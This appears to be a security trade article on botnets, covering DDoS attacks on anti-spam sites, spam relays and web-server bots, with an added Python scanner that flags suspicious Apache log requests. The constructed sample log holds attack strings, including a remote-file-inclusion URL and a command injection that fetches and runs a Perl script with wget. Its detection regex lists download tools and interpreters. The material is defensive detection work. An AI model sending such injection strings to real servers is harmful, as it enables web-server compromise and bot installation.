The Collective Power of BOTS
Stealth and self-preservation are characteristic of many types of malicious software; however, no malware is as prominent on the current threat landscape as bots.
A massive DDoS attack on the CastleCops Web site earlier this year demonstrated their power. A community of antimalware and antispam activists, CastleCops reported that the traffic directed at its Web site by the attacker's bots peaked at almost 1 Gbps. The flood inundated CastleCops' Internet pipe, making the Web site largely inaccessible for several days. The situation was reminiscent of DDoS attacks on spam-fighting sites Spamhaus, Spamnation and Blue Security; Blue Security ultimately could not withstand the sustained attack and closed down for good.
Such assaults demonstrate that attackers are becoming more aggressive at defending their spam- and malware-driven business models by punishing organizations and individuals they consider threats. Bots are a powerful weapon attackers can use for this purpose, providing attackers with the ability to command thousands of infected computers with a few keystrokes.
Being able to launch DDoS attacks allows the owner of the bot network (botnet) to discipline adversaries, extort money under the threat of such an attack, and offer attack services to others. One case of "DDoS for hire," documented by the FBI, involved the arrest of an owner of a sports apparel company on charges of hiring an attacker to disable the competitors' Web sites.
Sending spam messages is another common reason for employing a botnet. The spammer uses infected computers as spam relays, which provides him or her with virtually unlimited bandwidth and makes it very difficult for the defenders to block or trace the source of the unwanted messages.
Joe Stewart, a senior security researcher with managed security provider SecureWorks, in January analyzed a spam-related botnet powered by the Rustock Trojan that appeared to manipulate the price of a penny stock. The so-called pump-and-dump technique involved the attacker purchasing stock of a little-known company, hyping it up via spam messages and selling it as soon as it slightly increased in price. The technique can be surprisingly effective, earning a spammer as much as $20,000 over a weekend. Stewart's Web site was subsequently targeted by a DDoS attack the day after a newspaper described his analysis of the campaign.
Bot herders have been targeting desktop PCs of broadband users, using the infected computers as unwitting participants in a botnet, but this trend may be changing. Researchers at security assessment specialist Beyond Security (Gadi Evron, Kfir Damari and Noam Rathaus) this year observed an increase in the use of Web servers to construct botnets.
Server-focused bot herders exploit vulnerabilities in Web applications that are built using languages such as ASP, Perl and PHP to invoke their own scripts. Tynan Wilke, a SecureWorks researcher, documented one such campaign. In this attack, the bot herder used Google to locate servers with a vulnerable open-source Horde Webmail application and took advantage of the vulnerability to install a malicious Perl script. The bot allowed the attacker to launch DoS attacks, query Google for further propagation, and execute commands on the compromised Web server, according to Wilke.
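The server-focused campaigns described above leave traces in the Web server's own access logs: a request that hands the application a remote URL to include, or a query parameter carrying a command chain that fetches and runs a script. The following log scanner is an added example written for this article, not code from SecureWorks, Beyond Security or the Horde project, and it does not model any specific Horde vulnerability. It assumes Apache "combined" log format and uses coarse heuristics; the log lines are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines in Apache combined format (not real traffic).
# Addresses are from the RFC 5737 documentation ranges; paths are illustrative.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2007:10:01:22 +0000] "GET /webmail/index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Mar/2007:10:01:25 +0000] "GET /webmail/login.php?page=http://198.51.100.9/bot.txt? HTTP/1.1" 200 412 "-" "Mozilla/4.0"
198.51.100.23 - - [12/Mar/2007:10:02:03 +0000] "GET /cgi-bin/search.pl?q=cd%20/tmp;wget%20http://198.51.100.9/x.pl;perl%20x.pl HTTP/1.1" 500 120 "-" "libwww-perl/5.805"
192.0.2.44 - - [12/Mar/2007:10:03:10 +0000] "GET /about.html HTTP/1.1" 200 2210 "http://www.example.com/" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself a remote URL is the classic shape of a
# remote-file-inclusion attempt against PHP/Perl/ASP applications.
REMOTE_URL_RE = re.compile(r'(?i)^(?:https?|ftp)://')

# A shell separator followed by a download tool or interpreter suggests a
# command chain that fetches a script and runs it (the "install a Perl script" step).
SHELL_RE = re.compile(r'[;|`]\s*(?:wget|curl|lwp-download|perl|python|bash|sh)\b', re.I)


def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    reasons = []

    # Check each decoded parameter value for a remote URL.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value.strip()):
            reasons.append("remote_include")
            break

    # Check the whole decoded query string for a fetch-and-execute command chain.
    if SHELL_RE.search(unquote_plus(parts.query)):
        reasons.append("command_injection")

    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": parts.path,
        "status": m.group("status"),
        "ua": m.group("ua"),
        "reasons": reasons,
    }


def scan(log_text):
    """Scan a block of log text and return the list of findings in log order."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


def sources(findings):
    """Count findings per source address so repeat offenders stand out."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} status={f['status']} {','.join(f['reasons'])}")
```

Run against a real log, the scanner is a triage aid rather than a verdict: a hit on `remote_include` or `command_injection` is a reason to look at what the application did with that request (new files under `/tmp` or the Web root, unexpected child processes of the Web server, outbound connections from the server), not proof of compromise on its own. Legitimate traffic can occasionally carry a URL in a parameter, so the `path` and per-source counts are there to help prioritize.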